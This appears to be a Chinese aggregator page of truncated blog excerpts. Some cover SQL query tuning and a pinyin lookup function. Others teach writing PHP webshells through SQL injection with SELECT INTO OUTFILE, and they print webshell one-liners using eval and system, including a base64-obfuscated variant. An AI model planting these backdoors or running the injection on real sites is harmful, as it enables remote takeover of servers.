当我忘记SQL怎么写的时候，我……

讲一下SQL注入中写一句话拿webshell的原理,主要使用的是 SELECT ... INTO OUTFILE 这个语句,下面是一个语句的例子: SELECT * INTO OUTFILE 'C:\log1.txt' 这样就可以把查询到的数据写入到C盘的log1.txt这个文件里面.利用这个原理我们可以把PHP的一句话木马写到磁盘上从而拿到webshell. 本地的目标站点来实战一下,我们的目的是在目标的物理路径D:/WWW/下面生成一个php文件,从而可以使我们用菜刀连接上去:…

PHP一句话木马小总结与SQL语句写一句话木马

一.基础类的一句话--功能仅限于验证漏洞了,实际中太容易被查出出来: <?php @eval($_GET["code"])?> <?php @system($_POST["cmd"])?> 相信一目了然可以看懂如何使用这类一句话. 如果有疑问可以看我的博客PHP后门的eval类和system类函数到底有哪些区别二.编码的替换的类型: <?php @fputs(fopen(base64_decode('bG9zdC5waHA='),w…

理解SQL原理,写出高效代码

做软件开发的,大部分人都离不开跟数据库打交道,特别是erp开发的,跟数据库打交道更是频繁,存储过程动不动就是上千行,数据量大,人员流动大,那么我们还能保证下一段时间系统还能流畅的运行吗?我们还能保证下一个人能看懂我们的存储过程吗?(顺便打一下广告,我们也做ERP,欢迎联系咨询) 要知道sql语句,我想我们有必要知道sqlserver查询分析器怎么执行sql语句的,很多人会看执行计划,或者用profile来监视和调优查询语句或者存储过程慢的原因,但是如果我们知道查询分析器的执行逻辑顺序.平时大家多…

PHP结合SQL语句写一句话木马

一.基础类的一句话--功能仅限于验证漏洞了,实际中太容易被查出出来: 1 <?php @eval($_GET["code"])?> 2 <?php @system($_POST["cmd"])?> 相信一目了然可以看懂如何使用这类一句话.参考博主(https://www.cnblogs.com/KevinGeorge/)的博文二.编码的替换的类型: 1 <?php @fputs(fopen(base64_decode('bG9zdC5…

sql 首写字母查询姓名（字段）

来自网上大神,不知道是谁,挂不上链接 /////////////////////// 1.生成方法函数 create function f_GetPy(@str nvarchar(4000)) returns nvarchar(4000) as begin declare @strlen int,@re nvarchar(4000) declare @t table(chr nchar(1) collate Chinese_PRC_CI_AS,letter nchar(1)) insert in…